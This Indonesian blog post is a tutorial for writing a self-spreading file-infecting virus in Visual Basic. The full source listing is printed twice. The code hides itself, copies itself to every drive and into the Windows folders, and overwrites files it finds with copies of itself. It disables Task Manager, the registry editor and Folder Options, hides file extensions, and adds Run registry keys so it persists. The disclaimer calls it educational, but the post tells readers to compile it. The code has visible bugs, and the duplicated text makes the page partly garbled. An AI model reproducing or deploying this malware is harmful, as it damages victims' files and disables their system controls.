Ini adalah cara untuk membuat virus infected menggunakan Visual Basic
(yang belum begitu mengerti dengan visual basic disarankan untuk belajar dahulu dasar-dasar visual basic)
NOTE : artikel ini hanya bersifat pembelajaran. akibat dari penyalahgunaan di luar tanggung jawab kami.
- Sekaran buka Project dan siapkan formnya. kemudian copy listing di bawah ini ini di form
Option Explicit
Private Const FILE_ATTRIBUTE_READONLY = &H1
Private Const FILE_ATTRIBUTE_HIDDEN = &H2
Private Const FILE_ATTRIBUTE_SYSTEM = &H4'[=]
Private Const FILE_ATTRIBUTE_DIRECTORY = &H10
Private Const FILE_ATTRIBUTE_ARCHIVE = &H20
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Const FILE_ATTRIBUTE_COMPRESSED = &H800
Private Const MAX_PATH = 260
Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type
Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal LDrive As String) As Long Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lBuffer As String,
ByVal xSize As Long) As Long
Private Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" (ByVal lpFileName As String, lpFindFileData As
WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" (ByVal hFindFile As Long, lpFindFileData As
WIN32_FIND_DATA) As Long
Private Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal
lpNewFileName As String, ByVal bFaillExists As Long) As Long
Private pbMessage As Boolean
Private Function DriveType(Drive As String) As String
Dim cari As Long, kenali As String
If Len(penyimpan) = 1 Then penyimpan = penyimpan & ":\"
If Len(penyimpan) = 2 And Right$( penyimpan, 1) = ":" Then penyimpan = penyimpan & "\"
cari = GetDriveType(Drive)
Select Case cari
Case 2
kenali = "Removable Drive"
Case 3
kenali = "Fixed Drive"
Case 4
kenali = "Remote Drive"
Case 5
kenali = "CD-ROM"
Case 6
kenali = "RAM Disk"
Case Else
kenali = "Drive Doesn't Exist"
End Select
DriveType = kenali
End Function
Private Sub KopiKeDrive()
Dim ctr As Integer
Dim Drive As String
Dim x As Byte
ReDim Drives(0) As String
For ctr = 65 To 90
Drive = Chr(ctr) & ":\"
If DriveType(Drive) <> "Drive Doesn't Exist" Then
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", Drive & "KageBunshinNinjutsu.exe"
End If
Next
End Sub
Private Sub Kopykewindow()
Dim ff As String * 255
Dim n As Long
n = GetWindowsDirectory(ff, 255)
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", Left(ff, n) & "Nara.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\" & "Nara.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\system32" & "Nara.exe"
End Sub
Public Sub GetFiles(path As String, subFolder As Boolean, Optional Pattern As String = "*.*")
Screen.MousePointer = vbHourglass
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
fPath = AddBackSlash(path)
Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern
hFile = FindFirstFile(fName, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile "C:\Windows\Nara.exe", fPath & StripNulls(WFD.cFileName) & ".exe", 1
End If
If hFile > 0 Then
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile "C:\Windows\Nara.exe", fPath & StripNulls(WFD.cFileName) & ".exe", 1
End If
Wend
End If
If subFolder Then
hFile = FindFirstFile(fPath & "*.*", WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend
End If
FindClose hFile
Screen.MousePointer = vbDefault
End Sub
Private Function StripNulls(f As String) As String
StripNulls = Left$(f, InStr(1, f, Chr$(0)) - 1)
End Function
Private Function AddBackSlash(S As String) As String
If Len(S) Then
If Right$(S, 1) <> "\" Then
AddBackSlash = S & "\"
Else
AddBackSlash = S
End If
Else
AddBackSlash = "\"
End If
End Function
Private Sub Infeksi()
GetFiles "c:", True, ".doc"
GetFiles "d:", True, ".doc"
GetFiles "e:", True, ".doc"
End Sub
Public Sub CreateKey(Folder As String, Value As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value
End Sub
Public Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "REG_DWORD"
End Sub
Private Sub Kasi_integer()
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedVal
ue", 1
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DevaultValu
e", 1
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedV
alue", 2
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DevaultVal
ue", 2
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0
CreateIntegerKey
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun", 1
End Sub
Private Sub Bertahan()
Dim petik As String
petik = """"
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\System32\Nara.exe" & petik
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\Nara.exe"& petik
CreateKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\Nara.exe" & petik
CreateKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik &
"C:\WINDOWS\System32\Nara.exe" & petik
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun\Virus", petik &
"C:\WINDOWS\System32\ Nara.exe" & petik
End Sub
Private Sub form_click()
App.TaskVisible = False
Me.visible = false
KopiKeDrive
Kopykewindow
Infeksi
Kasi_integer
Bertahan
End Sub
- Selesai dan tinggal di compile
*Sebaiknya jangan di uji coba di PC sendiri
[Sumber : Click Here]
(yang belum begitu mengerti dengan visual basic disarankan untuk belajar dahulu dasar-dasar visual basic)
NOTE : artikel ini hanya bersifat pembelajaran. akibat dari penyalahgunaan di luar tanggung jawab kami.
- Sekaran buka Project dan siapkan formnya. kemudian copy listing di bawah ini ini di form
Option Explicit
Private Const FILE_ATTRIBUTE_READONLY = &H1
Private Const FILE_ATTRIBUTE_HIDDEN = &H2
Private Const FILE_ATTRIBUTE_SYSTEM = &H4'[=]
Private Const FILE_ATTRIBUTE_DIRECTORY = &H10
Private Const FILE_ATTRIBUTE_ARCHIVE = &H20
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Const FILE_ATTRIBUTE_COMPRESSED = &H800
Private Const MAX_PATH = 260
Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type
Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal LDrive As String) As Long Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lBuffer As String,
ByVal xSize As Long) As Long
Private Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" (ByVal lpFileName As String, lpFindFileData As
WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" (ByVal hFindFile As Long, lpFindFileData As
WIN32_FIND_DATA) As Long
Private Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal
lpNewFileName As String, ByVal bFaillExists As Long) As Long
Private pbMessage As Boolean
Private Function DriveType(Drive As String) As String
Dim cari As Long, kenali As String
If Len(penyimpan) = 1 Then penyimpan = penyimpan & ":\"
If Len(penyimpan) = 2 And Right$( penyimpan, 1) = ":" Then penyimpan = penyimpan & "\"
cari = GetDriveType(Drive)
Select Case cari
Case 2
kenali = "Removable Drive"
Case 3
kenali = "Fixed Drive"
Case 4
kenali = "Remote Drive"
Case 5
kenali = "CD-ROM"
Case 6
kenali = "RAM Disk"
Case Else
kenali = "Drive Doesn't Exist"
End Select
DriveType = kenali
End Function
Private Sub KopiKeDrive()
Dim ctr As Integer
Dim Drive As String
Dim x As Byte
ReDim Drives(0) As String
For ctr = 65 To 90
Drive = Chr(ctr) & ":\"
If DriveType(Drive) <> "Drive Doesn't Exist" Then
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", Drive & "KageBunshinNinjutsu.exe"
End If
Next
End Sub
Private Sub Kopykewindow()
Dim ff As String * 255
Dim n As Long
n = GetWindowsDirectory(ff, 255)
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", Left(ff, n) & "Nara.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\" & "Nara.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\system32" & "Nara.exe"
End Sub
Public Sub GetFiles(path As String, subFolder As Boolean, Optional Pattern As String = "*.*")
Screen.MousePointer = vbHourglass
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
fPath = AddBackSlash(path)
Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern
hFile = FindFirstFile(fName, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile "C:\Windows\Nara.exe", fPath & StripNulls(WFD.cFileName) & ".exe", 1
End If
If hFile > 0 Then
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile "C:\Windows\Nara.exe", fPath & StripNulls(WFD.cFileName) & ".exe", 1
End If
Wend
End If
If subFolder Then
hFile = FindFirstFile(fPath & "*.*", WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend
End If
FindClose hFile
Screen.MousePointer = vbDefault
End Sub
Private Function StripNulls(f As String) As String
StripNulls = Left$(f, InStr(1, f, Chr$(0)) - 1)
End Function
Private Function AddBackSlash(S As String) As String
If Len(S) Then
If Right$(S, 1) <> "\" Then
AddBackSlash = S & "\"
Else
AddBackSlash = S
End If
Else
AddBackSlash = "\"
End If
End Function
Private Sub Infeksi()
GetFiles "c:", True, ".doc"
GetFiles "d:", True, ".doc"
GetFiles "e:", True, ".doc"
End Sub
Public Sub CreateKey(Folder As String, Value As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value
End Sub
Public Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "REG_DWORD"
End Sub
Private Sub Kasi_integer()
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedVal
ue", 1
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DevaultValu
e", 1
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedV
alue", 2
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DevaultVal
ue", 2
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0
CreateIntegerKey
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun", 1
End Sub
Private Sub Bertahan()
Dim petik As String
petik = """"
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\System32\Nara.exe" & petik
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\Nara.exe"& petik
CreateKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\Nara.exe" & petik
CreateKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik &
"C:\WINDOWS\System32\Nara.exe" & petik
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun\Virus", petik &
"C:\WINDOWS\System32\ Nara.exe" & petik
End Sub
Private Sub form_click()
App.TaskVisible = False
Me.visible = false
KopiKeDrive
Kopykewindow
Infeksi
Kasi_integer
Bertahan
End Sub
- Selesai dan tinggal di compile
*Sebaiknya jangan di uji coba di PC sendiri
[Sumber : Click Here]
Post a Comment